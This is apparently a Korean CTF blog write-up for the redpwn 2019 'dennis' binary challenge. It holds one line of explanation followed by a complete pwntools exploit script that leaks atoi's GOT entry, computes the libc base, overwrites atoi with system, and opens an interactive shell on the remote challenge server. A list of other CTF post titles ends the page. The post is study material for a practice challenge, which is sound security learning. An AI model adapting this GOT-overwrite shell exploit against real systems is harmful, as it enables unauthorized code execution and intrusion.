yeet()을 통해 원하는 주소에 값을 쓸 수 있다!
from pwn import *
s = remote("chall2.2019.redpwn.net",4006)
elf = ELF("./dennis")
libc = ELF("./libc.so.6")
def greet(size):
s.sendlineafter("Command me: ","1")
s.sendlineafter("greet? : ",str(size))
def writ(size):
s.sendlineafter("Command me: ","2")
s.sendlineafter("? : ",str(size))
def yeet():
s.sendlineafter("Command me: ","3")
def eat(content):
s.sendlineafter("Command me: ","4")
s.sendlineafter("Pizza: ",content)
def delet():
s.sendlineafter("Command me: ","5")
def repeat(content):
s.sendlineafter("Command me: ","6")
s.sendlineafter("repeat",content)
def bye():
s.sendlineafter("Command me: ","7")
greet(32)
eat(p32(elf.got['atoi'])+p32(0x0804B050))
yeet()
writ(4)
leak = u32(s.recv(4))
print "leak : " + hex(leak)
libc_base = leak - libc.symbols['atoi']
print "libc_base : " + hex(libc_base)
system = libc_base + libc.symbols['system']
print "system : " + hex(system)
eat(p32(system))
s.sendlineafter("me: ","1")
s.sendlineafter("?","sh")
s.interactive()
| [SECCON_2018] kindvm (0) | 2019.11.11 |
|---|---|
| [Codegate_2019] aeiou (0) | 2019.11.11 |
| [RCTF 2018] babyheap (0) | 2019.08.14 |
| [HITCON 2016] house_of_orange (0) | 2019.08.13 |
| [WITHCON 2016] normal malloc (0) | 2019.02.26 |